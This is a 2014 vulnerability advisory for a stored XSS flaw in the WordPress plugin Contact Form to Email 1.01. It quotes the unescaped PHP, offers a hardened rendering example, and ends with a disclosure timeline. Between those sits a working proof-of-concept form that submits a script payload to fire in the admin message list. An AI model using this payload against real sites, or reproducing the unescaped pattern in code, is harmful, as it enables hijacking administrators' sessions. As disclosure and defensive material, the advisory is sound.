22-11-2014 / Vulnerabilities

Contact Form to Email 1.01 XSS

Data is not escaped correctly.

File: contact-form-to-email\cp-main-class.inc.php (unnecessary lines skipped)

// Raw $_POST values are concatenated into $buffer and stored without any sanitisation.
$buffer = "";
foreach ($_POST as $item => $value)
if (isset($fields[str_replace($sequence,'',$item)]))
{
    $buffer .= $fields[str_replace($sequence,'',$item)] . ": ". (is_array($value)?(implode(", ",$value)):($value)) . "\n\n";
    $params[str_replace($sequence,'',$item)] = $value;
}
$buffer_A = $buffer;
$rows_affected = $wpdb->insert( $wpdb->prefix.$this->table_messages, array( 'formid' => $this->item,
                                'time' => current_time('mysql'),
                                'ipaddr' => $_SERVER['REMOTE_ADDR'],
                                'notifyto' => $_POST[$to.$sequence],
                                'posted_data' => serialize($params),
                                'data' =>$buffer_A
                               ) );

The stored XSS fires when an admin views the message list.

File: cp-admin-int-message-list.inc.php

$data = $events[$i]->data;
$posted_data = unserialize($events[$i]->posted_data);
foreach ($posted_data as $item => $value)
    if (strpos($item,"_url") && $value != '')
    {
        $data = str_replace ($posted_data[str_replace("_url","",$item)],'<a href="'.$value.'" target="_blank">'.$posted_data[str_replace("_url","",$item)].'</a><br />',$data);
    }
// Sink: the stored user input is echoed as HTML without escaping.
echo str_replace("\n","<br />",$data);
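For comparison, a hardened rendering of the same message-list output, added here as an example and not the plugin's own fix. It assumes the same $events row fields (data, posted_data) and WordPress's esc_html(), esc_url() and esc_attr() helpers; the function name cp_render_message_safely is hypothetical.

```php
<?php
// Added example (not the plugin's code): escape each stored value for the
// context it lands in, at output time, instead of echoing raw stored input.
function cp_render_message_safely( $event ) {
    $data        = (string) $event->data;
    $posted_data = unserialize( $event->posted_data );
    if ( ! is_array( $posted_data ) ) {
        $posted_data = array();
    }

    // Escape the stored text once, before any HTML is built around it.
    $html = esc_html( $data );

    foreach ( $posted_data as $item => $value ) {
        if ( strpos( $item, '_url' ) === false || $value === '' || is_array( $value ) ) {
            continue;
        }
        $base = str_replace( '_url', '', $item );
        if ( ! isset( $posted_data[ $base ] ) || is_array( $posted_data[ $base ] ) ) {
            continue;
        }
        // The link text already sits in $html in escaped form, so match that form
        // and replace it with a link whose href (esc_url drops non-whitelisted
        // schemes such as javascript:) and text are each escaped for their context.
        $needle = esc_html( (string) $posted_data[ $base ] );
        if ( $needle === '' ) {
            continue;
        }
        $link = '<a href="' . esc_url( (string) $value ) . '" target="_blank" rel="noopener">'
              . $needle . '</a><br />';
        $html = str_replace( $needle, $link, $html );
    }

    // Newlines become <br /> only after every user-controlled piece is escaped.
    return str_replace( "\n", '<br />', $html );
}

// Usage in the admin list loop (hypothetical call site):
// echo cp_render_message_safely( $events[ $i ] );
```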

Proof of Concept

We assume the admin uses the default form with a "subject" field and does not use a captcha.

If not, submit the form directly on the website and put the XSS payload in any field.

<form method="POST" action="http://wordpress-instalation/">
    <input type="hidden" name="cp_pform_psequence" value="_1">
    <input type="hidden" name="cp_contactformtoemail_pform_process" value="1">
    Form Id: <input type="text" name="cp_contactformtoemail_id" value="1"><br />
    XSS:<input type="text" name="subject_1" value="&lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt;">
    <input type="submit" value="Hack!">
</form>

The XSS fires when the admin opens the message list at:

http://wordpress-instalation/wp-admin/options-general.php?page=cp_contactformtoemail&list=1&cal=%form_id%

Timeline

  • 19-10-2014: Discovered
  • 08-11-2014: Vendor notified
  • 08-11-2014: Version 1.0.1 released, issue resolved